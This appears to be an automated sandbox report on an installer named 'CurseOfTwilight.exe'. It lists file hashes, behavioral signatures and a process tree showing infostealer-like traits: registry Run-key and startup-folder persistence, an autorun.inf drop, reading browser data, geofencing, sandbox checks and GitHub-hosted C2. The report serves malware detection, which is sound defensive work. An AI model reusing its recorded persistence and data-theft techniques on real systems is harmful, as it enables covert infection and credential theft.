Overview
Static (score 7)
Targets (score, platform):
- CurseOfTwilight.exe: 3, windows10-1703-x64
- $PLUGINSDI...ls.dll: 7, windows10-1703-x64
- $PLUGINSDI...em.dll: 3, windows10-1703-x64
- CurseOfTwilight.exe: 3, windows10-1703-x64
- LICENSES.c...m.html: 7, windows10-1703-x64
- d3dcompiler_47.dll: 6, windows10-1703-x64
- ffmpeg.dll: 1, windows10-1703-x64
- libEGL.dll: 1, windows10-1703-x64
- libGLESv2.dll: 1, windows10-1703-x64
- locales/de.ps1: 1, windows10-1703-x64
- resources/elevate.exe: 1, windows10-1703-x64
- vk_swiftshader.dll: 1, windows10-1703-x64
- vulkan-1.dll: 1, windows10-1703-x64
- $PLUGINSDI...7z.dll: 1, windows10-1703-x64
Analysis
- max time kernel: 151s
- max time network: 173s
- platform: windows10-1703_x64
- resource: win10-20240221-en
- resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 02/03/2024, 22:42
Static task: static1
Behavioral tasks (sample, resource):
- behavioral1: CurseOfTwilight.exe, win10-20240221-en
- behavioral2: $PLUGINSDIR/StdUtils.dll, win10-20240221-en
- behavioral3: $PLUGINSDIR/System.dll, win10-20240221-en
- behavioral4: CurseOfTwilight.exe, win10-20240221-en
- behavioral5: LICENSES.chromium.html, win10-20240221-en
- behavioral6: d3dcompiler_47.dll, win10-20240221-en
- behavioral7: ffmpeg.dll, win10-20240221-en
- behavioral8: libEGL.dll, win10-20240221-en
- behavioral9: libGLESv2.dll, win10-20240221-en
- behavioral10: locales/de.ps1, win10-20240221-en
- behavioral11: resources/elevate.exe, win10-20240221-en
- behavioral12: vk_swiftshader.dll, win10-20240221-en
- behavioral13: vulkan-1.dll, win10-20240221-en
- behavioral14: $PLUGINSDIR/nsis7z.dll, win10-20240221-en
General
- Target: CurseOfTwilight.exe
- Size: 158.4MB
- MD5: b74d098f0a6ae42c6bf9d6d576115bdf
- SHA1: 89efb5b86ce578b0f3946e98aebbd00ca60161ba
- SHA256: e8b492b418a2855e3806e7f756414f37442e6efde006c7ca2615cfbe8fbf9f6e
- SHA512: 40a6c666057c21f7744812f8d466448f245ef56247cd0db179358aeb7635fa77980691e3d542f9b9dba30579d6bb330874cfc561c1fbce43bec8b4ce549852b7
- SSDEEP: 1572864:XdPcKUXsjgWcPlYufjnCtdTG1pTkvqN3PN5g9qPKFTQyun+9qS/ALy/s88IcgDFf:w1os5I8Ax
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Control Panel\International\Geo\Nation (process CurseOfTwilight.exe)
- Drops startup file (1 IoCs)
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseOfTwilight.exe (process CurseOfTwilight.exe)
- Loads dropped DLL (2 IoCs)
  - pid/process: 4840 CurseOfTwilight.exe; 4840 CurseOfTwilight.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  - Set value (str): \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupP0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CurseOfTwilight.exe" (process reg.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\Start_P0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_P0HaCU.vbs" (process reg.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 4 IoCs)
  - flow/ioc: 37 raw.githubusercontent.com; 26 raw.githubusercontent.com; 28 raw.githubusercontent.com; 30 raw.githubusercontent.com
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  - flow/ioc: 13 ipinfo.io; 14 ipinfo.io
- Drops autorun.inf file (1 TTPs, 1 IoCs)
  Malware can abuse Windows Autorun to spread further via attached volumes.
  - File created: F:\autorun.inf (process CurseOfTwilight.exe)
- Checks processor information in registry (2 TTPs, 7 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz (process CurseOfTwilight.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString (process CurseOfTwilight.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 (process CurseOfTwilight.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (process CurseOfTwilight.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (process CurseOfTwilight.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (process CurseOfTwilight.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (process CurseOfTwilight.exe)
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - pid/process: 2788 schtasks.exe
- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
  - pid/process: 9616 WMIC.exe
- Enumerates processes with tasklist (1 TTPs, 64 IoCs)
  - pids (all tasklist.exe): 7408, 7392, 7100, 7084, 6832, 6760, 6572, 7204, 7356, 7092, 6784, 6776, 6712, 7524, 7492, 7328, 7116, 7108, 6932, 6612, 6880, 6952, 7320, 7016, 6992, 6740, 6640, 6488, 6908, 7364, 7500, 7336, 6816, 6968, 7508, 6856, 7424, 7032, 3812, 6960, 6800, 6792, 6900, 7416, 1728, 7468, 7400, 7344, 7124, 7000, 6824, 6872, 6564, 1728, 6696, 7380, 7372, 7460, 6480, 6924, 6864, 7008, 6672, 6688
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (48 IoCs)
  - pid/process, in report order: 4840 CurseOfTwilight.exe (x6); 10064 powershell.exe (x4); 9616 powershell.exe (x4); 6588 powershell.exe (x2); 8692 powershell.exe (x2); 6088 powershell.exe (x3); 8692 powershell.exe; 6588 powershell.exe; 6088 powershell.exe; 8692 powershell.exe; 6588 powershell.exe; 7632 powershell.exe (x4); 2380 powershell.exe (x4); 9308 powershell.exe (x4); 10656 powershell.exe (x4); 6136 powershell.exe (x4); 5904 CurseOfTwilight.exe (x2)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  - Token: SeShutdownPrivilege, 4840 CurseOfTwilight.exe
  - Token: SeCreatePagefilePrivilege, 4840 CurseOfTwilight.exe
  - Token: SeDebugPrivilege, 3812 tasklist.exe
  - Tokens for 4752 WMIC.exe, the following sequence recorded twice (42 entries): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - Token: SeShutdownPrivilege, 4840 CurseOfTwilight.exe
  - Token: SeCreatePagefilePrivilege, 4840 CurseOfTwilight.exe
  - Token: SeShutdownPrivilege, 4840 CurseOfTwilight.exe
  - Token: SeCreatePagefilePrivilege, 4840 CurseOfTwilight.exe
  - Token: SeDebugPrivilege, tasklist.exe pids 6500, 6480, 6472, 6564, 6612, 6648, 6792, 6556, 6488, 6776, 6432, 6784, 6800, 6632, 6740
- Suspicious use of WriteProcessMemory (64 IoCs)
  Columns: description; pid Process; procid_target (identical consecutive rows collapsed with a count)
  - PID 4840 wrote to memory of 3640; 4840 CurseOfTwilight.exe; 73 (x2)
  - PID 3640 wrote to memory of 3812; 3640 cmd.exe; 75 (x2)
  - PID 4840 wrote to memory of 1284; 4840 CurseOfTwilight.exe; 77 (x30)
  - PID 4840 wrote to memory of 3696; 4840 CurseOfTwilight.exe; 78 (x2)
  - PID 4840 wrote to memory of 4352; 4840 CurseOfTwilight.exe; 79 (x2)
  - PID 4352 wrote to memory of 4752; 4352 cmd.exe; 81 (x2)
  - PID 4840 wrote to memory of 4684; 4840 CurseOfTwilight.exe; 82 (x2)
  - PID 4840 wrote to memory of 3744; 4840 CurseOfTwilight.exe; 84 (x2)
  - PID 4840 wrote to memory of 344; 4840 CurseOfTwilight.exe; 85 (x2)
  - PID 4840 wrote to memory of 828; 4840 CurseOfTwilight.exe; 87 (x2)
  - PID 4840 wrote to memory of 3088; 4840 CurseOfTwilight.exe; 89 (x2)
  - PID 4840 wrote to memory of 1172; 4840 CurseOfTwilight.exe; 90 (x2)
  - PID 4840 wrote to memory of 68; 4840 CurseOfTwilight.exe; 91 (x2)
  - PID 4840 wrote to memory of 4748; 4840 CurseOfTwilight.exe; 92 (x2)
  - PID 4840 wrote to memory of 2864; 4840 CurseOfTwilight.exe; 94 (x2)
  - PID 4840 wrote to memory of 4488; 4840 CurseOfTwilight.exe; 95 (x2)
  - PID 4840 wrote to memory of 4296; 4840 CurseOfTwilight.exe; 96 (x2)
  - PID 4840 wrote to memory of 4300; 4840 CurseOfTwilight.exe; 98 (x2)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Views/modifies file attributes (1 TTPs, 2 IoCs)
  - pid/process: 6584 attrib.exe; 9072 attrib.exe
Processes (tree nesting level in brackets; signatures triggered by a process are listed under it)
[1] PID 4840  C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"
  - Checks computer location settings
  - Drops startup file
  - Loads dropped DLL
  - Drops autorun.inf file
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  [2] PID 3640  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - Suspicious use of WriteProcessMemory
    [3] PID 3812  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 1284  C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  [2] PID 3696  C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=2148 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  [2] PID 4352  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
    - Suspicious use of WriteProcessMemory
    [3] PID 4752  C:\Windows\System32\Wbem\WMIC.exe  cmdline: wmic process where processid=4840 get ExecutablePath
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4684  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6432  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 3744  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6620  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 344  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6612  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 828  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6832  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3088  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6688  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1172  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6488  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 68  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6720  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4748  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6556  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 2864  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6472  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4488  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6672  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4296  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6752  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4300  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6844  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 3760  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6564  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 428  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6480  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 200  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6500  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4788  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7160  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4108  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6952  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2816  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6856  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4720  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7100  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4304  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6760  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4784  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6572  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3816  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7048  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 1092  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7304  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 5100  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6648  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4576  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6968  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4736  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6976  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 1044  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6696  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4624  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6740  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 3404  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6824  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4820  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7132  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4516  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7056  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 692  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6712  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2772  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6924  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4476  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6872  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4832  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7016  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4536  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6960  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 996  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6640  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2280  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7108  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2044  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7032  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1260  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7344  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3328  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7632  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 208  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7492  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1496  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6932  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2388  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6808  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 1336  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7524  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1048  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6900  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2436  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7400  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3680  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6908  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 380  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7516  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 1588  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7336  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 5072  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6816  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1652  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6944  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 2224  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7372  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1872  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6984  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 1952  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6992  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1532  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7040  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 1436  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7364  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3076  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7392  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4764  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7356  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2576  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7460  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1940  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7476  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4700  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7116  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3720  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 1728  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1480  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6776  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 4804  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7484  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 4180  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7380  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4148  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7124  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 4164  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6784  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 3956  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 4188  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 212  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 6792  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  [2] PID 3036  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7536  C:\Windows\system32\tasklist.exe  cmdline: tasklist
  [2] PID 224  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7424  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3840  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7204  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3812  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7084  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 3640  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7408  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 1020  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7328  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
  [2] PID 2216  C:\Windows\system32\cmd.exe  cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    [3] PID 7000  C:\Windows\system32\tasklist.exe  cmdline: tasklist
      - Enumerates processes with tasklist
